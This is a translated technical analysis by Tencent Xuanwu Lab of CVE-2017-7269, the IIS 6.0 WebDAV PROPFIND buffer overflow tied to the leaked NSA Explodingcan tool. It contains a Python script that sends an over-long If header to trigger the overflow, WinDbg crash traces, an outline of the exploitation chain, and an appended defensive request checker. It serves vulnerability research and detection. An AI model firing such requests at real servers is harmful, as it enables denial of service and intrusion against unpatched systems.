In-depth analysis of the IIS vulnerability the NSA used for 5 years

2017-04-19T00:00:00
ID MYHACK58:62201785397
Type myhack58
Reporter Anonymous
Modified 2017-04-19T00:00:00

Description

Source: Xuanwu Lab

Author: Ke Liu of Tencent’s Xuanwu Lab

1. Vulnerability description

1.1 Exploit description

On March 27, 2017, Zhiniang Peng and Chen Wu of South China University of Technology disclosed exploit code for an IIS 6.0 vulnerability on GitHub [1], noting that it may have been used in attacks as early as July or August 2016.

The vulnerability is CVE-2017-7269 [2] and is triggered by a malicious PROPFIND request: when the If header contains an over-long URL of the form <http://localhost/xxxx>, a buffer overflow results. There are in fact two overflows, one on the stack and one on the heap.

Microsoft ended support for Windows Server 2003 on July 14, 2015, so there is no official patch for this vulnerability; 0patch [3] provides a temporary fix.

Coincidentally, on April 14, 2017 the Shadow Brokers released a batch of new NSA hacking tools. After analysis the author confirmed that Explodingcan among them is an exploit for CVE-2017-7269, and that the two exploits are written in exactly the same way, so there is reason to believe they come from the same team:

  • Both exploits share the same basic structure;
  • Both fill the payload data in at address 0x680312c0;
  • Both bypass DEP via KiFastSystemCall / NtProtectVirtualMemory.

This article takes the exploit published in March as its basis and analyses the vulnerability's underlying principle and exploitation techniques in detail.

1.2 Overview of the principle

  • CStackBuffer can use the stack to store small amounts of data and the heap to store large amounts;
  • When allocating storage for a CStackBuffer, the number of characters is mistakenly used as the number of bytes; this is the root cause of the vulnerability;
  • Because there is a stack cookie, the return address cannot be overwritten directly;
  • The overflow is triggered to rewrite the CStackBuffer object itself so that it uses the address 0x680312c0 as its storage area;
  • The payload data is then written to 0x680312c0;
  • The program has another similar vulnerability; in the same way, that overflow overwrites a pointer on the stack to point at 0x680313c0;
  • 0x680313c0 is treated as the start address of an object, and a virtual function call on it takes control of execution;
  • KiFastSystemCall is invoked via SharedUserData to bypass DEP;
  • The URL is converted from UTF-8 to UNICODE form;
  • The shellcode is encoded in Unicode alphanumeric form.

2. The vulnerability principle

2.1 Environment configuration

Install IIS on Windows Server 2003 R2 Standard Edition SP2 and enable the WebDAV feature.

Change the target address in the exploit and run it. svchost.exe can then be seen starting the child process w3wp.exe, which in turn starts a calc.exe process under the NETWORK SERVICE identity.

2.2 Initial debugging

First, enable the PageHeap option for the w3wp.exe process; second, modify the exploit code to remove the shellcode so that it only sends a very long string.

```python
import socket

# Connect to the test IIS server and send a PROPFIND whose If header
# carries an over-long URL (no shellcode, just a long run of 'A').
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.75.134', 80))
pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay += 'If: <http://localhost/aaaaaaa'
pay += 'A' * 10240
pay += '>\r\n\r\n'
sock.send(pay.encode())  # encode for Python 3; the original was Python 2 str
sock.close()
```

After running this, the IIS server starts a w3wp.exe process, which does not crash. Attach WinDbg to that process and run the test code again; by catching the first-chance exception in the debugger, the following can be learned:

  • A heap overflow occurs while copying memory at httpext!ScStoragePathFromUrl+0x360;
  • The content and size of the overflow appear to be controllable;
  • The overflowed heap block was allocated at httpext!HrCheckIfHeader+0x0000013c;
  • The crash location is also reached from the function httpext!HrCheckIfHeader;
  • The process has exception handling and therefore does not crash.

```
$$ Catch the first chance exception
0:020> g
(e74.e80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00005014 ebx=00002809 ecx=00000a06 edx=0781e7e0 esi=0781a7e4 edi=07821000
eip=67126fdb esp=03fef330 ebp=03fef798 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
httpext!ScStoragePathFromUrl+0x360:
67126fdb f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

0:006> r ecx
ecx=00000a06

0:006> db esi
0781a7e4  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0781a7f4  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0781a804  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0781a814  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0781a824  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0781a834  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0781a844  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0781a854  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

$$ Allocation call stack of the target heap block
0:006> !heap -p -a edi
    address 07821000 found in
    _DPH_HEAP_ROOT @ 7021000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 7023680:          781e7d8             2828 -          781e000             4000
    7c83d97a ntdll!RtlAllocateHeap+0x00000e9f
    5b7e1a40 staxmem!MpHeapAlloc+0x000000f3
    5b7e1308 staxmem!ExchMHeapAlloc+0x00000015
    67125df9 httpext!CHeap::Alloc+0x00000017
    67125ee1 httpext!ExAlloc+0x00000008
    67125462 httpext!HrCheckIfHeader+0x0000013c
    6712561e httpext!HrCheckStateHeaders+0x00000010
    6711f659 httpext!CPropFindRequest::Execute+0x000000f0
    6711f7c5 httpext!DAVPropFind+0x00000047
    $$ ......

$$ Call stack
0:006> k
ChildEBP RetAddr
03fef798 67119469 httpext!ScStoragePathFromUrl+0x360
03fef7ac 67125484 httpext!CMethUtil::ScStoragePathFromUrl+0x18
03fefc34 6712561e httpext!HrCheckIfHeader+0x15e
03fefc44 6711f659 httpext!HrCheckStateHeaders+0x10
03fefc78 6711f7c5 httpext!CPropFindRequest::Execute+0xf0
03fefc90 671296f2 httpext!DAVPropFind+0x47
$$ ......

$$ The exception can be handled, so the process does not crash
0:006> g
(e74.e80): C++ EH exception - code e06d7363 (first chance)
```
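As an added example (not part of the original article or the author's code), covering both the character-count versus byte-count root cause from 1.2 and the long If-header test from 2.2: a small Python checker that parses a raw WebDAV request, measures every <...> tag in the If header, and reports the UTF-16 byte length next to the character count so the size discrepancy the bug relies on is visible. The 2048-character threshold and the two sample requests are constructed assumptions.

```python
import re

# Constructed threshold for one <...> resource tag in a WebDAV If: header;
# tune it to the longest URL a legitimate client would send.
MAX_IF_TAG_CHARS = 2048

IF_TAG_RE = re.compile(r"<([^>]*)>")


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers); header names lowercased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("utf-8", "replace")
    lines = head.split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def utf16_bytes_needed(tag: str) -> int:
    """Bytes a UTF-16 copy of the tag occupies. The root cause described in 1.2 is
    that the character count (len(tag)) was used where this byte count was needed."""
    return len(tag.encode("utf-16-le"))


def check_if_header(raw: bytes):
    """Return one finding per over-long If: tag; an empty list means the request is clean."""
    method, path, headers = parse_request(raw)
    findings = []
    for tag in IF_TAG_RE.findall(headers.get("if", "")):
        chars = len(tag)
        if chars > MAX_IF_TAG_CHARS:
            findings.append({
                "method": method,
                "path": path,
                "chars": chars,
                "utf16_bytes": utf16_bytes_needed(tag),
                "tag_prefix": tag[:32],
            })
    return findings


# Constructed samples: the first is shaped like the long-string test in 2.2,
# the second is an ordinary PROPFIND carrying a lock token.
LONG_REQUEST = (b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
                b"If: <http://localhost/aaaaaaa" + b"A" * 10240 + b">\r\n\r\n")
BENIGN_REQUEST = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
                  b"If: (<opaquelocktoken:example-1234>)\r\n\r\n")
```

Running check_if_header over LONG_REQUEST yields one finding of 10264 characters that would need 20528 bytes once widened, while BENIGN_REQUEST yields none.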
